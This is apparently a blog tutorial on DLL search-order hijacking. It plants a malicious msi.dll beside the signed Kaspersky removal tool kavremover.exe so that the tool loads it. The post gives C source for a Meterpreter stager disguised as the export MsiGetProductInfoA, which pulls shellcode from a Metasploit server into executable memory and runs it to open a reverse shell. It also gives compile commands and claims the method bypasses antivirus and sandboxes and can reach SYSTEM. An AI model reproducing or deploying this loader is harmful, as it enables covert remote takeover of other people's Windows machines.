Today I will show you an interesting example how to search for vulnerable Dll functions that we can compile into our custom Meterpreter DLL loader and let a signed executable execute it.
I have taken the good old Kaspersky Removal tool called kavremover. This tool is perfect for this example. As a host system I have Windows 7 SP1 64bit. What we will need is the SysinternalsSuite toolkit, most importantly the Process Monitor (procmon.exe). So we start procmon.exe and create a filter rule for process name called kavremover.exe so we can select only this process for analysis. Next we load kavremover.exe and search for vulnerable DLL paths. After a while I came across the following DLL that gets searched first in the execution path i.e in the root folder where the kavremover.exe is executed. (In our case it is the users desktop)
So we then search all the dlls for some interesting function that gets loaded from msi.dll and I have found an interesting list here:
There are two functions in msi.dll called GetInfo and MsiGetProductInfoA. So lets try and modify our meterpreter dll file a little and change the main() function to either GetInfo or MsiGetProductInfoA.
The generator from my previous post generates a binary and c source file called temp.c. After setting the Metasploit server IP and port number, open the temp.c and modify the function main() to something like this:
int MsiGetProductInfoA(int argc, char * argv[]) {
FreeConsole();
ULONG32 size;
char * buffer;
void (*function)();
winsock_init();
SOCKET my_socket = wsconnect(server, atoi(serverp));
int count = recv(my_socket, (char *)&size, 4, 0);
if (count != 4 || size <= 0)
punt(my_socket, "error lenght\n");
buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buffer == NULL)
punt(my_socket, "error in buf\n");
buffer[0] = 0xBF;
memcpy(buffer + 1, &my_socket, 4);
count = recv_all(my_socket, buffer + 5, size);
function = (void (*)())buffer;
function();
return 0;
}
Please note that if you use int GetInfo() the kavremover.exe will crash and we wont get a reverse shell, so use MsiGetProductInfoA, this works just fine although the whole program wont load properly of course, but it gets the job done. Once modified, compile the temp.c
i586-mingw32msvc-gcc temp.c -o payload.dll -lws2_32 -shared strip payload.dll mv payload.dll msi.dll
Next we can upload the final msi.dll to the virtual testing system where the kavremover.exe is waiting. Start your favorite reverse shell payload via Metasploit and wait for the shell to pop up once we execute kavremover.exe
kavremover.exe is digitally signed so in many cases our dll will get loaded just fine, thus bypassing many sandbox techniques (like Comodo AV ) and allowing us to elevate to NT AUTHORITY/SYSTEM
Here is a short video of the whole process
Also here is a short video demonstrating the attack against fully updated Windows 8.1 64bit with active Windows Defender (kinda lame but nevertheless)…
And now to think what could possibly go wrong ….. (Win 8.1 64bit + Comodo AV Advanced 6)
